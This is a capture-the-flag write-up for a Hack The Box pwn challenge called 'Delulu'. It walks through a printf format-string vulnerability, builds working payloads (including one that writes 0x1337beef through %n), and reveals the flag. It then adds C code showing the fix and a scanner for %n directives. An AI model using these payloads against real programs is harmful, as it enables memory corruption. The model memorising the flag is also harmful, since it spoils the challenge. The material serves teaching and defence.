Delulu [pwn]
Recognition protocol initiated. Please present your face for scanning.
Pwn - 300 points
Walkthrough
We start by downloading the source files. We are given a binary, delulu. Opening it with Ghidra we can find a few interesting lines:
```c
long local_48;                 // compared against 0x1337beef below
long *local_40;
undefined8 user_input;
...
read(0,&user_input,0x1f);
printf("\n[!] Checking.. ");
printf((char *)&user_input);   // user input is used as the format string
if (local_48 == 0x1337beef) {
  delulu();                    // prints the flag
}
```
The function delulu prints the flag, so we need to set local_48 to 0x1337beef. We can't set this value directly, but the code above contains a printf call that uses our input as its format string. This is a format string vulnerability, and we can use it to write the value 0x1337beef to the address of local_48.
You can find more information about format string exploits here.
Let's build our payload step by step:
```
AAAAAAAA%8$p
```
This prints the 8th argument on the stack, which is our eight A's. (We can use gdb to make debugging easier.)
```
AAAAAAAA%7$n
```
%n stores the number of characters printed so far, so this writes 8 to the 7th argument on the stack, which is local_48.
We need to write 0x1337beef, so 0x1337beef characters have to be printed before the %7$n. That is 322420463 characters in decimal. Instead of sending that many characters, we use a width specifier so that printf pads the output itself:
```
%322420463x%7$n
```
Connecting to the server and providing this input gives us the flag after 'some' time:
```
1c157380
You managed to deceive the robot, here's your new identity: HTB{m45t3r_0f_d3c3pt10n}
```
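To put the bug this writeup relies on next to its fix, here is an added example (constructed for this page, not the challenge binary's code or the author's): the vulnerable printf pattern beside the corrected call, a function showing what %n actually records when a width specifier pads the output, and a scanner that flags conversion directives (in particular %n) in untrusted input. The function names and the sample strings are assumptions of this example; the samples reuse the payloads shown above.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed example (not the challenge binary): the vulnerable pattern seen in
   the decompiled code beside its fixed form, plus two small checks. */

/* Vulnerable: the user buffer is the format string, so "%p" reads stack slots
   and "%n" writes the output count through a pointer taken from the stack.
   gcc and clang flag this call with -Wformat-security. */
void check_vulnerable(const char *user_input) {
    printf("\n[!] Checking.. ");
    printf(user_input);
}

/* Fixed: the format string is a literal and the input is printed as data, so
   a "%7$n" in the input is just four characters of text. */
void check_fixed(const char *user_input) {
    printf("\n[!] Checking.. ");
    printf("%s", user_input);
}

/* What %n records: the number of characters printed before it. The width
   specifier makes printf pad the output, which is why "%322420463x%7$n" stores
   0x1337beef without sending that many bytes. Here the count goes into a local
   int, not through a pointer taken from the stack. */
int chars_counted_by_n(int width) {
    char buf[64];
    int count = 0;
    /* Assumed value: the 8-hex-digit word echoed by the server in the writeup.
       Any value of at most `width` digits gives the same count. */
    snprintf(buf, sizeof buf, "%*x%n", width, 0x1c157380u, &count);
    return count;
}

/* Scanner for printf conversion directives in untrusted input, e.g. to log or
   reject input before it reaches a printf-like sink. Returns the number of
   directives and sets *writes if any of them is %n. "%%" is a literal percent. */
int scan_format_directives(const char *s, bool *writes) {
    int count = 0;
    *writes = false;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        p++;
        /* skip positional "N$", flags, width, precision and length modifiers */
        while (*p && strchr("0123456789$.-+ #lhzjt", *p)) p++;
        if (!*p) break;
        count++;
        if (*p == 'n') *writes = true;
    }
    return count;
}

/* Renders input the way check_fixed does, into a buffer, so the behaviour can
   be checked instead of only printed. */
int render_fixed(char *out, size_t n, const char *user_input) {
    return snprintf(out, n, "%s", user_input);
}

int main(void) {
    bool writes;
    /* Constructed samples: the two payloads from the writeup and a harmless string. */
    const char *samples[] = { "AAAAAAAA%8$p", "%322420463x%7$n", "hello" };
    for (size_t i = 0; i < 3; i++) {
        int n = scan_format_directives(samples[i], &writes);
        printf("%-20s directives=%d writes=%s\n", samples[i], n, writes ? "yes" : "no");
    }
    printf("%%n after a width of 8 counts %d characters\n", chars_counted_by_n(8));
    check_fixed("%7$n");
    printf("\n");
    return 0;
}
```

The scanner is deliberately simple (it does not validate that a directive is well formed); its purpose is to show that the only reliable fix is a literal format string, with input scanning as a secondary detection signal for logs.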